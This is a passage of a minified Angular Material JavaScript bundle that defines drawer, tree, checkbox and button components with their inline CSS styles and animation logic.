.mat-drawer-content{transition:none}.mat-drawer-backdrop{top:0;left:0;right:0;bottom:0;position:absolute;display:block;z-index:3;visibility:hidden}.mat-drawer-backdrop.mat-drawer-shown{visibility:visible}.mat-drawer-transition .mat-drawer-backdrop{transition-duration:400ms;transition-timing-function:cubic-bezier(0.25, 0.8, 0.25, 1);transition-property:background-color,visibility}.cdk-high-contrast-active .mat-drawer-backdrop{opacity:.5}.mat-drawer-content{position:relative;z-index:1;display:block;height:100%;overflow:auto}.mat-drawer-transition .mat-drawer-content{transition-duration:400ms;transition-timing-function:cubic-bezier(0.25, 0.8, 0.25, 1);transition-property:transform,margin-left,margin-right}.mat-drawer{position:relative;z-index:4;display:block;position:absolute;top:0;bottom:0;z-index:3;outline:0;box-sizing:border-box;overflow-y:auto;transform:translate3d(-100%, 0, 0)}.cdk-high-contrast-active .mat-drawer,.cdk-high-contrast-active [dir=rtl] .mat-drawer.mat-drawer-end{border-right:solid 1px currentColor}.cdk-high-contrast-active [dir=rtl] .mat-drawer,.cdk-high-contrast-active .mat-drawer.mat-drawer-end{border-left:solid 1px currentColor;border-right:none}.mat-drawer.mat-drawer-side{z-index:2}.mat-drawer.mat-drawer-end{right:0;transform:translate3d(100%, 0, 0)}[dir=rtl] .mat-drawer{transform:translate3d(100%, 0, 0)}[dir=rtl] .mat-drawer.mat-drawer-end{left:0;right:auto;transform:translate3d(-100%, 0, 0)}.mat-drawer[style*="visibility: hidden"]{display:none}.mat-drawer-inner-container{width:100%;height:100%;overflow:auto;-webkit-overflow-scrolling:touch}.mat-sidenav-fixed{position:fixed}'],encapsulation:2,changeDetection:0}),t})(),VW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,uu,uu,la]}),t})();const f_e=dp(Zc(hu));let Y3=(()=>{class t extends f_e{constructor(e,i,n){super(e,i),this.tabIndex=Number(n)||0}ngOnInit(){super.ngOnInit()}ngOnDestroy(){super.ngOnDestroy()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh),Vr("tabindex"))},t.\u0275dir=Ot({type:t,selectors:[["mat-tree-node"]],hostAttrs:[1,"mat-tree-node"],inputs:{role:"role",disabled:"disabled",tabIndex:"tabIndex"},exportAs:["matTreeNode"],features:[ki([{provide:hu,useExisting:t}]),ci]}),t})(),Kw=(()=>{class t extends k3{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matTreeNodeDef",""]],inputs:{when:["matTreeNodeDefWhen","when"],data:["matTreeNode","data"]},features:[ki([{provide:k3,useExisting:t}]),ci]}),t})(),J3=(()=>{class t extends Tw{constructor(e,i,n,r){super(e,i,n),this._disabled=!1,this.tabIndex=Number(r)||0}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e)}get tabIndex(){return this.disabled?-1:this._tabIndex}set tabIndex(e){this._tabIndex=null!=e?e:0}ngOnInit(){super.ngOnInit()}ngAfterContentInit(){super.ngAfterContentInit()}ngOnDestroy(){super.ngOnDestroy()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh),Ee(yd),Vr("tabindex"))},t.\u0275dir=Ot({type:t,selectors:[["mat-nested-tree-node"]],hostAttrs:[1,"mat-nested-tree-node"],inputs:{role:"role",disabled:"disabled",tabIndex:"tabIndex",node:["matNestedTreeNode","node"]},exportAs:["matNestedTreeNode"],features:[ki([{provide:Tw,useExisting:t},{provide:hu,useExisting:t},{provide:S3,useExisting:t}]),ci]}),t})(),ab=(()=>{class t{constructor(e,i){this.viewContainer=e,this._node=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(S3,8))},t.\u0275dir=Ot({type:t,selectors:[["","matTreeNodeOutlet",""]],features:[ki([{provide:Gy,useExisting:t}])]}),t})(),Xw=(()=>{class t extends zh{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-tree"]],viewQuery:function(e,i){if(1&e&&Mi(ab,7),2&e){let n;Vt(n=Bt())&&(i._nodeOutlet=n.first)}},hostAttrs:["role","tree",1,"mat-tree"],exportAs:["matTree"],features:[ki([{provide:zh,useExisting:t}]),ci],decls:1,vars:0,consts:[["matTreeNodeOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[ab],styles:[".mat-tree{display:block}.mat-tree-node{display:flex;align-items:center;flex:1;word-wrap:break-word}.mat-nested-tree-node{border-bottom-width:0}"],encapsulation:2}),t})(),Yw=(()=>{class t extends Dw{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matTreeNodeToggle",""]],inputs:{recursive:["matTreeNodeToggleRecursive","recursive"]},features:[ki([{provide:Dw,useExisting:t}]),ci]}),t})(),BW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[xw,la,la]}),t})();class HW extends _z{constructor(){super(...arguments),this._data=new zs([])}get data(){return this._data.value}set data(a){this._data.next(a)}connect(a){return ra(a.viewChange,this._data).pipe(Xe(()=>this.data))}disconnect(){}}const __e=["input"],g_e=["label"],C_e=function(t){return{enterDuration:t}},y_e=["*"],b_e=new ni("mat-checkbox-default-options",{providedIn:"root",factory:UW});function UW(){return{color:"accent",clickAction:"check-indeterminate"}}let M_e=0;const qW=UW(),v_e={provide:Ls,useExisting:ja(()=>br),multi:!0};class A_e{}const T_e=dp(Pd(El(Zc(class{constructor(t){this._elementRef=t}}))));let E_e=(()=>{class t extends T_e{constructor(e,i,n,r,c,d,T){super(i),this._changeDetectorRef=n,this._ngZone=r,this._animationMode=d,this._options=T,this.ariaLabel="",this.ariaLabelledby=null,this.labelPosition="after",this.name=null,this.change=new Tt,this.indeterminateChange=new Tt,this._onTouched=()=>{},this._currentAnimationClass="",this._currentCheckState=0,this._controlValueAccessorChangeFn=()=>{},this._checked=!1,this._disabled=!1,this._indeterminate=!1,this._options=this._options||qW,this.color=this.defaultColor=this._options.color||qW.color,this.tabIndex=parseInt(c)||0,this.id=this._uniqueId=`${e}${++M_e}`}get inputId(){return`${this.id||this._uniqueId}-input`}get required(){return this._required}set required(e){this._required=wi(e)}ngAfterViewInit(){this._syncIndeterminate(this._indeterminate)}get checked(){return this._checked}set checked(e){const i=wi(e);i!=this.checked&&(this._checked=i,this._changeDetectorRef.markForCheck())}get disabled(){return this._disabled}set disabled(e){const i=wi(e);i!==this.disabled&&(this._disabled=i,this._changeDetectorRef.markForCheck())}get indeterminate(){return this._indeterminate}set indeterminate(e){const i=e!=this._indeterminate;this._indeterminate=wi(e),i&&(this._transitionCheckState(this._indeterminate?3:this.checked?1:2),this.indeterminateChange.emit(this._indeterminate)),this._syncIndeterminate(this._indeterminate)}_isRippleDisabled(){return this.disableRipple||this.disabled}_onLabelTextChange(){this._changeDetectorRef.detectChanges()}writeValue(e){this.checked=!!e}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e}_getAriaChecked(){return this.checked?"true":this.indeterminate?"mixed":"false"}_transitionCheckState(e){let i=this._currentCheckState,n=this._getAnimationTargetElement();if(i!==e&&n&&(this._currentAnimationClass&&n.classList.remove(this._currentAnimationClass),this._currentAnimationClass=this._getAnimationClassForCheckStateTransition(i,e),this._currentCheckState=e,this._currentAnimationClass.length>0)){n.classList.add(this._currentAnimationClass);const r=this._currentAnimationClass;this._ngZone.runOutsideAngular(()=>{setTimeout(()=>{n.classList.remove(r)},1e3)})}}_emitChangeEvent(){this._controlValueAccessorChangeFn(this.checked),this.change.emit(this._createChangeEvent(this.checked)),this._inputElement&&(this._inputElement.nativeElement.checked=this.checked)}toggle(){this.checked=!this.checked,this._controlValueAccessorChangeFn(this.checked)}_handleInputClick(){var e;const i=null===(e=this._options)||void 0===e?void 0:e.clickAction;this.disabled||"noop"===i?!this.disabled&&"noop"===i&&(this._inputElement.nativeElement.checked=this.checked,this._inputElement.nativeElement.indeterminate=this.indeterminate):(this.indeterminate&&"check"!==i&&Promise.resolve().then(()=>{this._indeterminate=!1,this.indeterminateChange.emit(this._indeterminate)}),this._checked=!this._checked,this._transitionCheckState(this._checked?1:2),this._emitChangeEvent())}_onInteractionEvent(e){e.stopPropagation()}_onBlur(){Promise.resolve().then(()=>{this._onTouched(),this._changeDetectorRef.markForCheck()})}_getAnimationClassForCheckStateTransition(e,i){if("NoopAnimations"===this._animationMode)return"";switch(e){case 0:if(1===i)return this._animationClasses.uncheckedToChecked;if(3==i)return this._checked?this._animationClasses.checkedToIndeterminate:this._animationClasses.uncheckedToIndeterminate;break;case 2:return 1===i?this._animationClasses.uncheckedToChecked:this._animationClasses.uncheckedToIndeterminate;case 1:return 2===i?this._animationClasses.checkedToUnchecked:this._animationClasses.checkedToIndeterminate;case 3:return 1===i?this._animationClasses.indeterminateToChecked:this._animationClasses.indeterminateToUnchecked}return""}_syncIndeterminate(e){const i=this._inputElement;i&&(i.nativeElement.indeterminate=e)}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&(Mi(__e,5),Mi(g_e,5),Mi(Dl,5)),2&e){let n;Vt(n=Bt())&&(i._inputElement=n.first),Vt(n=Bt())&&(i._labelElement=n.first),Vt(n=Bt())&&(i.ripple=n.first)}},inputs:{ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],id:"id",required:"required",labelPosition:"labelPosition",name:"name",value:"value",checked:"checked",disabled:"disabled",indeterminate:"indeterminate"},outputs:{change:"change",indeterminateChange:"indeterminateChange"},features:[ci]}),t})(),br=(()=>{class t extends E_e{constructor(e,i,n,r,c,d,T){super("mat-checkbox-",e,i,r,c,d,T),this._focusMonitor=n,this._animationClasses={uncheckedToChecked:"mat-checkbox-anim-unchecked-checked",uncheckedToIndeterminate:"mat-checkbox-anim-unchecked-indeterminate",checkedToUnchecked:"mat-checkbox-anim-checked-unchecked",checkedToIndeterminate:"mat-checkbox-anim-checked-indeterminate",indeterminateToChecked:"mat-checkbox-anim-indeterminate-checked",indeterminateToUnchecked:"mat-checkbox-anim-indeterminate-unchecked"}}_createChangeEvent(e){const i=new A_e;return i.source=this,i.checked=e,i}_getAnimationTargetElement(){return this._elementRef.nativeElement}ngAfterViewInit(){super.ngAfterViewInit(),this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{e||this._onBlur()})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef)}_onInputClick(e){e.stopPropagation(),super._handleInputClick()}focus(e,i){e?this._focusMonitor.focusVia(this._inputElement,e,i):this._inputElement.nativeElement.focus(i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(js),Ee(qi),Vr("tabindex"),Ee(ar,8),Ee(b_e,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-checkbox"]],hostAttrs:[1,"mat-checkbox"],hostVars:14,hostBindings:function(e,i){2&e&&(Gs("id",i.id),Rt("tabindex",null)("aria-label",null)("aria-labelledby",null),Ct("mat-checkbox-indeterminate",i.indeterminate)("mat-checkbox-checked",i.checked)("mat-checkbox-disabled",i.disabled)("mat-checkbox-label-before","before"==i.labelPosition)("_mat-animation-noopable","NoopAnimations"===i._animationMode))},inputs:{disableRipple:"disableRipple",color:"color",tabIndex:"tabIndex"},exportAs:["matCheckbox"],features:[ki([v_e]),ci],ngContentSelectors:y_e,decls:17,vars:21,consts:[[1,"mat-checkbox-layout"],["label",""],[1,"mat-checkbox-inner-container"],["type","checkbox",1,"mat-checkbox-input","cdk-visually-hidden",3,"id","required","checked","disabled","tabIndex","change","click"],["input",""],["matRipple","",1,"mat-checkbox-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled","matRippleRadius","matRippleCentered","matRippleAnimation"],[1,"mat-ripple-element","mat-checkbox-persistent-ripple"],[1,"mat-checkbox-frame"],[1,"mat-checkbox-background"],["version","1.1","focusable","false","viewBox","0 0 24 24","aria-hidden","true",1,"mat-checkbox-checkmark"],["fill","none","stroke","white","d","M4.1,12.7 9,17.6 20.3,6.3",1,"mat-checkbox-checkmark-path"],[1,"mat-checkbox-mixedmark"],[1,"mat-checkbox-label",3,"cdkObserveContent"],["checkboxLabel",""],[2,"display","none"]],template:function(e,i){if(1&e&&(Jn(),m(0,"label",0,1)(2,"span",2)(3,"input",3,4),he("change",function(r){return i._onInteractionEvent(r)})("click",function(r){return i._onInputClick(r)}),u(),m(5,"span",5),it(6,"span",6),u(),it(7,"span",7),m(8,"span",8),fi(),m(9,"svg",9),it(10,"path",10),u(),ln(),it(11,"span",11),u()(),m(12,"span",12,13),he("cdkObserveContent",function(){return i._onLabelTextChange()}),m(14,"span",14),s(15,"\xa0"),u(),va(16),u()()),2&e){const n=Ti(1),r=Ti(13);Rt("for",i.inputId),C(2),Ct("mat-checkbox-inner-container-no-side-margin",!r.textContent||!r.textContent.trim()),C(1),V("id",i.inputId)("required",i.required)("checked",i.checked)("disabled",i.disabled)("tabIndex",i.tabIndex),Rt("value",i.value)("name",i.name)("aria-label",i.ariaLabel||null)("aria-labelledby",i.ariaLabelledby)("aria-checked",i._getAriaChecked())("aria-describedby",i.ariaDescribedby),C(2),V("matRippleTrigger",n)("matRippleDisabled",i._isRippleDisabled())("matRippleRadius",20)("matRippleCentered",!0)("matRippleAnimation",fr(19,C_e,"NoopAnimations"===i._animationMode?0:150))}},dependencies:[Dl,P3],styles:['@keyframes mat-checkbox-fade-in-background{0%{opacity:0}50%{opacity:1}}@keyframes mat-checkbox-fade-out-background{0%,50%{opacity:1}100%{opacity:0}}@keyframes mat-checkbox-unchecked-checked-checkmark-path{0%,50%{stroke-dashoffset:22.910259}50%{animation-timing-function:cubic-bezier(0, 0, 0.2, 0.1)}100%{stroke-dashoffset:0}}@keyframes mat-checkbox-unchecked-indeterminate-mixedmark{0%,68.2%{transform:scaleX(0)}68.2%{animation-timing-function:cubic-bezier(0, 0, 0, 1)}100%{transform:scaleX(1)}}@keyframes mat-checkbox-checked-unchecked-checkmark-path{from{animation-timing-function:cubic-bezier(0.4, 0, 1, 1);stroke-dashoffset:0}to{stroke-dashoffset:-22.910259}}@keyframes mat-checkbox-checked-indeterminate-checkmark{from{animation-timing-function:cubic-bezier(0, 0, 0.2, 0.1);opacity:1;transform:rotate(0deg)}to{opacity:0;transform:rotate(45deg)}}@keyframes mat-checkbox-indeterminate-checked-checkmark{from{animation-timing-function:cubic-bezier(0.14, 0, 0, 1);opacity:0;transform:rotate(45deg)}to{opacity:1;transform:rotate(360deg)}}@keyframes mat-checkbox-checked-indeterminate-mixedmark{from{animation-timing-function:cubic-bezier(0, 0, 0.2, 0.1);opacity:0;transform:rotate(-45deg)}to{opacity:1;transform:rotate(0deg)}}@keyframes mat-checkbox-indeterminate-checked-mixedmark{from{animation-timing-function:cubic-bezier(0.14, 0, 0, 1);opacity:1;transform:rotate(0deg)}to{opacity:0;transform:rotate(315deg)}}@keyframes mat-checkbox-indeterminate-unchecked-mixedmark{0%{animation-timing-function:linear;opacity:1;transform:scaleX(1)}32.8%,100%{opacity:0;transform:scaleX(0)}}.mat-checkbox-background,.mat-checkbox-frame{top:0;left:0;right:0;bottom:0;position:absolute;border-radius:2px;box-sizing:border-box;pointer-events:none}.mat-checkbox{display:inline-block;transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);cursor:pointer;-webkit-tap-highlight-color:rgba(0,0,0,0);position:relative}.mat-checkbox._mat-animation-noopable{transition:none !important;animation:none !important}.mat-checkbox .mat-ripple-element:not(.mat-checkbox-persistent-ripple){opacity:.16}.mat-checkbox .mat-checkbox-ripple{position:absolute;left:calc(50% - 20px);top:calc(50% - 20px);height:40px;width:40px;z-index:1;pointer-events:none}.mat-checkbox-layout{-webkit-user-select:none;user-select:none;cursor:inherit;align-items:baseline;vertical-align:middle;display:inline-flex;white-space:nowrap}.mat-checkbox-label{-webkit-user-select:auto;user-select:auto}.mat-checkbox-inner-container{display:inline-block;height:16px;line-height:0;margin:auto;margin-right:8px;order:0;position:relative;vertical-align:middle;white-space:nowrap;width:16px;flex-shrink:0}[dir=rtl] .mat-checkbox-inner-container{margin-left:8px;margin-right:auto}.mat-checkbox-inner-container-no-side-margin{margin-left:0;margin-right:0}.mat-checkbox-frame{background-color:rgba(0,0,0,0);transition:border-color 90ms cubic-bezier(0, 0, 0.2, 0.1);border-width:2px;border-style:solid}._mat-animation-noopable .mat-checkbox-frame{transition:none}.mat-checkbox-background{align-items:center;display:inline-flex;justify-content:center;transition:background-color 90ms cubic-bezier(0, 0, 0.2, 0.1),opacity 90ms cubic-bezier(0, 0, 0.2, 0.1);-webkit-print-color-adjust:exact;color-adjust:exact}._mat-animation-noopable .mat-checkbox-background{transition:none}.cdk-high-contrast-active .mat-checkbox .mat-checkbox-background{background:none}.mat-checkbox-persistent-ripple{display:block;width:100%;height:100%;transform:none}.mat-checkbox-inner-container:hover .mat-checkbox-persistent-ripple{opacity:.04}.mat-checkbox.cdk-keyboard-focused .mat-checkbox-persistent-ripple{opacity:.12}.mat-checkbox-persistent-ripple,.mat-checkbox.mat-checkbox-disabled .mat-checkbox-inner-container:hover .mat-checkbox-persistent-ripple{opacity:0}@media(hover: none){.mat-checkbox-inner-container:hover .mat-checkbox-persistent-ripple{display:none}}.mat-checkbox-checkmark{top:0;left:0;right:0;bottom:0;position:absolute;width:100%}.mat-checkbox-checkmark-path{stroke-dashoffset:22.910259;stroke-dasharray:22.910259;stroke-width:2.1333333333px}.cdk-high-contrast-black-on-white .mat-checkbox-checkmark-path{stroke:#000 !important}.mat-checkbox-mixedmark{width:calc(100% - 6px);height:2px;opacity:0;transform:scaleX(0) rotate(0deg);border-radius:2px}.cdk-high-contrast-active .mat-checkbox-mixedmark{height:0;border-top:solid 2px;margin-top:2px}.mat-checkbox-label-before .mat-checkbox-inner-container{order:1;margin-left:8px;margin-right:auto}[dir=rtl] .mat-checkbox-label-before .mat-checkbox-inner-container{margin-left:auto;margin-right:8px}.mat-checkbox-checked .mat-checkbox-checkmark{opacity:1}.mat-checkbox-checked .mat-checkbox-checkmark-path{stroke-dashoffset:0}.mat-checkbox-checked .mat-checkbox-mixedmark{transform:scaleX(1) rotate(-45deg)}.mat-checkbox-indeterminate .mat-checkbox-checkmark{opacity:0;transform:rotate(45deg)}.mat-checkbox-indeterminate .mat-checkbox-checkmark-path{stroke-dashoffset:0}.mat-checkbox-indeterminate .mat-checkbox-mixedmark{opacity:1;transform:scaleX(1) rotate(0deg)}.mat-checkbox-unchecked .mat-checkbox-background{background-color:rgba(0,0,0,0)}.mat-checkbox-disabled{cursor:default}.cdk-high-contrast-active .mat-checkbox-disabled{opacity:.5}.mat-checkbox-anim-unchecked-checked .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-in-background}.mat-checkbox-anim-unchecked-checked .mat-checkbox-checkmark-path{animation:180ms linear 0ms mat-checkbox-unchecked-checked-checkmark-path}.mat-checkbox-anim-unchecked-indeterminate .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-in-background}.mat-checkbox-anim-unchecked-indeterminate .mat-checkbox-mixedmark{animation:90ms linear 0ms mat-checkbox-unchecked-indeterminate-mixedmark}.mat-checkbox-anim-checked-unchecked .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-out-background}.mat-checkbox-anim-checked-unchecked .mat-checkbox-checkmark-path{animation:90ms linear 0ms mat-checkbox-checked-unchecked-checkmark-path}.mat-checkbox-anim-checked-indeterminate .mat-checkbox-checkmark{animation:90ms linear 0ms mat-checkbox-checked-indeterminate-checkmark}.mat-checkbox-anim-checked-indeterminate .mat-checkbox-mixedmark{animation:90ms linear 0ms mat-checkbox-checked-indeterminate-mixedmark}.mat-checkbox-anim-indeterminate-checked .mat-checkbox-checkmark{animation:500ms linear 0ms mat-checkbox-indeterminate-checked-checkmark}.mat-checkbox-anim-indeterminate-checked .mat-checkbox-mixedmark{animation:500ms linear 0ms mat-checkbox-indeterminate-checked-mixedmark}.mat-checkbox-anim-indeterminate-unchecked .mat-checkbox-background{animation:180ms linear 0ms mat-checkbox-fade-out-background}.mat-checkbox-anim-indeterminate-unchecked .mat-checkbox-mixedmark{animation:300ms linear 0ms mat-checkbox-indeterminate-unchecked-mixedmark}.mat-checkbox-input{bottom:0;left:50%}.mat-checkbox-input:focus~.mat-focus-indicator::before{content:""}'],encapsulation:2,changeDetection:0}),t})(),GW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})(),jW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Od,la,$y,GW,la,GW]}),t})();const w_e=["mat-button",""],I_e=["*"],S_e=["mat-button","mat-flat-button","mat-icon-button","mat-raised-button","mat-stroked-button","mat-mini-fab","mat-fab"],k_e=Pd(Zc(El(class{constructor(t){this._elementRef=t}})));let da=(()=>{class t extends k_e{constructor(e,i,n){super(e),this._focusMonitor=i,this._animationMode=n,this.isRoundButton=this._hasHostAttributes("mat-fab","mat-mini-fab"),this.isIconButton=this._hasHostAttributes("mat-icon-button");for(const r of S_e)this._hasHostAttributes(r)&&this._getHostElement().classList.add(r);e.nativeElement.classList.add("mat-button-base"),this.isRoundButton&&(this.color="accent")}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0)}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef)}focus(e,i){e?this._focusMonitor.focusVia(this._getHostElement(),e,i):this._getHostElement().focus(i)}_getHostElement(){return this._elementRef.nativeElement}_isRippleDisabled(){return this.disableRipple||this.disabled}_hasHostAttributes(...e){return e.some(i=>this._getHostElement().hasAttribute(i))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["button","mat-button",""],["button","mat-raised-button",""],["button","mat-icon-button",""],["button","mat-fab",""],["button","mat-mini-fab",""],["button","mat-stroked-button",""],["button","mat-flat-button",""]],viewQuery:function(e,i){if(1&e&&Mi(Dl,5),2&e){let n;Vt(n=Bt())&&(i.ripple=n.first)}},hostAttrs:[1,"mat-focus-indicator"],hostVars:5,hostBindings:function(e,i){2&e&&(Rt("disabled",i.disabled||null),Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode)("mat-button-disabled",i.disabled))},inputs:{disabled:"disabled",disableRipple:"disableRipple",color:"color"},exportAs:["matButton"],features:[ci],attrs:w_e,ngContentSelectors:I_e,decls:4,vars:5,consts:[[1,"mat-button-wrapper"],["matRipple","",1,"mat-button-ripple",3,"matRippleDisabled","matRippleCentered","matRippleTrigger"],[1,"mat-button-focus-overlay"]],template:function(e,i){1&e&&(Jn(),m(0,"span",0),va(1),u(),it(2,"span",1)(3,"span",2)),2&e&&(C(2),Ct("mat-button-ripple-round",i.isRoundButton||i.isIconButton),V("matRippleDisabled",i._isRippleDisabled())("matRippleCentered",i.isIconButton)("matRippleTrigger",i._getHostElement()))},dependencies:[Dl],styles:[".mat-button .mat-button-focus-overlay,.mat-icon-button .mat-button-focus-overlay{opacity:0}.mat-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay,.mat-stroked-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay{opacity:.04}@media(hover: none){.mat-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay,.mat-stroked-button:hover:not(.mat-button-disabled) .mat-button-focus-overlay{opacity:0}}.mat-button,.mat-icon-button,.mat-stroked-button,.mat-flat-button{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible}.mat-button::-moz-focus-inner,.mat-icon-button::-moz-focus-inner,.mat-stroked-button::-moz-focus-inner,.mat-flat-button::-moz-focus-inner{border:0}.mat-button.mat-button-disabled,.mat-icon-button.mat-button-disabled,.mat-stroked-button.mat-button-disabled,.mat-flat-button.mat-button-disabled{cursor:default}.mat-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-button.cdk-program-focused .mat-button-focus-overlay,.mat-icon-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-icon-button.cdk-program-focused .mat-button-focus-overlay,.mat-stroked-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-stroked-button.cdk-program-focused .mat-button-focus-overlay,.mat-flat-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-flat-button.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-button::-moz-focus-inner,.mat-icon-button::-moz-focus-inner,.mat-stroked-button::-moz-focus-inner,.mat-flat-button::-moz-focus-inner{border:0}.mat-raised-button{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1)}.mat-raised-button::-moz-focus-inner{border:0}.mat-raised-button.mat-button-disabled{cursor:default}.mat-raised-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-raised-button.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-raised-button::-moz-focus-inner{border:0}.mat-raised-button._mat-animation-noopable{transition:none !important;animation:none !important}.mat-stroked-button{border:1px solid currentColor;padding:0 15px;line-height:34px}.mat-stroked-button .mat-button-ripple.mat-ripple,.mat-stroked-button .mat-button-focus-overlay{top:-1px;left:-1px;right:-1px;bottom:-1px}.mat-fab{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);min-width:0;border-radius:50%;width:56px;height:56px;padding:0;flex-shrink:0}.mat-fab::-moz-focus-inner{border:0}.mat-fab.mat-button-disabled{cursor:default}.mat-fab.cdk-keyboard-focused .mat-button-focus-overlay,.mat-fab.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-fab::-moz-focus-inner{border:0}.mat-fab._mat-animation-noopable{transition:none !important;animation:none !important}.mat-fab .mat-button-wrapper{padding:16px 0;display:inline-block;line-height:24px}.mat-mini-fab{box-sizing:border-box;position:relative;-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);min-width:0;border-radius:50%;width:40px;height:40px;padding:0;flex-shrink:0}.mat-mini-fab::-moz-focus-inner{border:0}.mat-mini-fab.mat-button-disabled{cursor:default}.mat-mini-fab.cdk-keyboard-focused .mat-button-focus-overlay,.mat-mini-fab.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-mini-fab::-moz-focus-inner{border:0}.mat-mini-fab._mat-animation-noopable{transition:none !important;animation:none !important}.mat-mini-fab .mat-button-wrapper{padding:8px 0;display:inline-block;line-height:24px}.mat-icon-button{padding:0;min-width:0;width:40px;height:40px;flex-shrink:0;line-height:40px;border-radius:50%}.mat-icon-button i,.mat-icon-button .mat-icon{line-height:24px}.mat-button-ripple.mat-ripple,.mat-button-focus-overlay{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none;border-radius:inherit}.mat-button-ripple.mat-ripple:not(:empty){transform:translateZ(0)}.mat-button-focus-overlay{opacity:0;transition:opacity 200ms cubic-bezier(0.35, 0, 0.25, 1),background-color 200ms cubic-bezier(0.35, 0, 0.25, 1)}._mat-animation-noopable .mat-button-focus-overlay{transition:none}.mat-button-ripple-round{border-radius:50%;z-index:1}.mat-button .mat-button-wrapper>*,.mat-flat-button .mat-button-wrapper>*,.mat-stroked-button .mat-button-wrapper>*,.mat-raised-button .mat-button-wrapper>*,.mat-icon-button .mat-button-wrapper>*,.mat-fab .mat-button-wrapper>*,.mat-mini-fab .mat-button-wrapper>*{vertical-align:middle}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon-button,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon-button{display:inline-flex;justify-content:center;align-items:center;font-size:inherit;width:2.5em;height:2.5em}.mat-flat-button::before,.mat-raised-button::before,.mat-fab::before,.mat-mini-fab::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 2px) * -1)}.mat-stroked-button::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 3px) * -1)}.cdk-high-contrast-active .mat-button,.cdk-high-contrast-active 